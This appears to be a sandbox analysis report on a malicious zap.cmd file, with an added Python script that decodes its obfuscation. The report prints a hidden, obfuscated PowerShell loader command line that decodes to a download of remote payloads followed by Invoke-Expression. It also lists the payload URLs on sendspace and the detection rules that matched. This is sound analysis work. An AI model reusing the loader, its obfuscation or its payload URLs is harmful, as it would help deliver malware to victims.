Source: |
Binary string: \??\C:\Windows\System.Management.Automation.pdb? source: powershell.exe, 00000005.00000002.2184760858.000000000784A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2184760858.0000000007831000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.Core.pdbSt source: powershell.exe, 00000005.00000002.2184760858.000000000784A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2184760858.0000000007831000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Source: global traffic |
HTTP traffic detected:
GET /pro/dl/5m5a1u HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected:
GET /dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: fs13n3.sendspace.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected:
GET /pro/dl/wyg3h5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected:
GET /dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: fs03n3.sendspace.com
Connection: Keep-Alive
Cookie: SID=mqp5phs8i4ibarpn7np6voj641 |
Source: powershell.exe, 00000005.00000002.2184760858.00000000077FA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000002.00000002.2441978527.000002045CC36000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs13n3.sendspace.com |
Source: powershell.exe, 00000002.00000002.2611833386.000002046AEC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2441978527.000002045AE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2178140808.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2921644464.0000000025F31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2441978527.000002045CBFE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000002.00000002.2441978527.000002045AE51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2178140808.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/ |
Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/I6 |
Source: wab.exe, 0000000A.00000003.2151778284.000000000A57F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin |
Source: wab.exe, 0000000A.00000003.2151778284.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin2d52 |
Source: wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin8F4H |
Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binP93 |
Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binj92 |
Source: wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binotBe |
Source: wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/m6 |
Source: powershell.exe, 00000002.00000002.2441978527.000002045CC23000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspaX |
Source: powershell.exe, 00000002.00000002.2441978527.000002045CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045B2E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com |
Source: powershell.exe, 00000002.00000002.2441978527.000002045B2E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045CBFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045CC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045B2E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com/dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb |
Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2441978527.000002045C0E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2611833386.000002046AEC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.2441978527.000002045B07D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045C713000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: powershell.exe, 00000002.00000002.2441978527.000002045B07D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/5m5a1uP |
Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/5m5a1uXRul |
Source: wab.exe, 0000000A.00000002.2920474997.00000000255A0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2907942536.000000000A552000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/wyg3h5 |
Source: wab.exe, 0000000A.00000003.2151778284.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/wyg3h5j83 |
Source: wab.exe, 0000000A.00000002.2907942536.000000000A552000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/wyg3h5z |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: amsi32_7744.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7488, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7744, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 2_2_00007FFD9B8AAB16 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 2_2_00007FFD9B8AB8C2 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_04BBE928 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_04BBF1F8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_04BBE5E0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 10_2_0327EB98 |
Source: amsi32_7744.amsi.csv, type: OTHER |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 7488, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 7744, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Mutant created: NULL |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Mutant created: \Sessions\1\BaseNamedObjects\2utLZrxcByvppTdF |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03 |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. 
Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,ca |
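The `Upstair91` function in the command line above is a stride decoder: `$Fomented` is assembled as 'Substring', and the loop reads one character at every sixth position starting at index 5 (stopping at Length-1, so the last six-character chunk is padding). Each quoted literal is therefore readable junk with the real string interleaved. The Python below is an added example, not code from the report or from the script's author: it reproduces that loop, decodes a subset of the assignments copied verbatim from the command line, and checks the decoded URL against the HTTP requests the sandbox recorded. The function names are this example's own, the HTTP sample is a re-keyed copy of the report's "HTTP traffic detected" entries, and the https scheme is an assumption (the report only shows the decrypted requests on port 443).

```python
"""Decoder for the string-obfuscation stub in the PowerShell command line above.

Added example, not code from the page or from the script's author. The encoded
literals are copied from the process-creation entry on this page; the names
upstair91, decode_assignments, observed_urls and explain are this example's own.
"""
import re


def upstair91(blob: str, start: int = 5, step: int = 6, width: int = 1) -> str:
    """Mirror the script's Upstair91: walk `blob` from index `start` in strides
    of `step`, keeping `width` characters at each stop.  The bound is
    len(blob) - width, exactly as in the PowerShell
    ($Noontide = $Contrive.Length - $Monostelous), so the trailing padding
    chunk ("Kompr ", "opbev ", ...) is never emitted."""
    out = []
    i = start
    while i < len(blob) - width:
        out.append(blob[i:i + width])
        i += step
    return "".join(out)


# A subset of the `$var=Upstair91 '...'` assignments, copied from the page.
SAMPLE_SCRIPT = (
    "$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';"
    "$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss"
    " SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstango"
    "fluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';"
    "$Detonate=Upstair91 ',nthr>opbev ';"
    "$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';"
)

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*Upstair91\s+'([^']*)'")


def decode_assignments(script: str) -> dict:
    """Return {variable: decoded string} for every `$var=Upstair91 '...'`."""
    return {name: upstair91(enc) for name, enc in ASSIGN_RE.findall(script)}


# Constructed copy of two of the report's "HTTP traffic detected" entries,
# request line and headers separated by newlines.
OBSERVED_REQUESTS = [
    "GET /pro/dl/5m5a1u HTTP/1.1\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0\n"
    "Host: www.sendspace.com\nConnection: Keep-Alive",
    "GET /dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb HTTP/1.1\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0\n"
    "Host: fs13n3.sendspace.com\nConnection: Keep-Alive",
]

REQ_RE = re.compile(r"^GET (\S+) HTTP/1\.[01]", re.M)
HOST_RE = re.compile(r"^Host: (\S+)", re.M)


def observed_urls(requests, scheme: str = "https") -> set:
    """Rebuild full URLs from request line + Host header (scheme is assumed)."""
    urls = set()
    for req in requests:
        path = REQ_RE.search(req)
        host = HOST_RE.search(req)
        if path and host:
            urls.add(f"{scheme}://{host.group(1)}{path.group(1)}")
    return urls


def explain(script: str, requests) -> dict:
    """Decode the script and tie the decoded values to what was observed."""
    decoded = decode_assignments(script)
    urls = observed_urls(requests)
    return {
        "decoded": decoded,
        # The first-stage URL in $Stot should be one of the requests on the wire.
        "url_seen_on_wire": decoded.get("Stot") in urls,
        # Skizoide is `.($Scrimshorn) ($Cheanne)`; if $Scrimshorn decodes to
        # iex, every Skizoide call is a dot-sourced Invoke-Expression.
        "skizoide_is_iex": decoded.get("Scrimshorn") == "iex",
    }


if __name__ == "__main__":
    for key, value in explain(SAMPLE_SCRIPT, OBSERVED_REQUESTS).items():
        print(key, "=", value)
```

Running it decodes `$Unrevengingly166` to the `User-Agent` header name, `$Stot` to the first sendspace URL that appears in the HTTP traffic entries, `$Detonate` to `>` and `$Scrimshorn` to `iex`, which is what makes each `Skizoide (Upstair91 '...')` call an Invoke-Expression of a decoded string. The same decoder applies to the remaining literals in the command line once they are copied out intact.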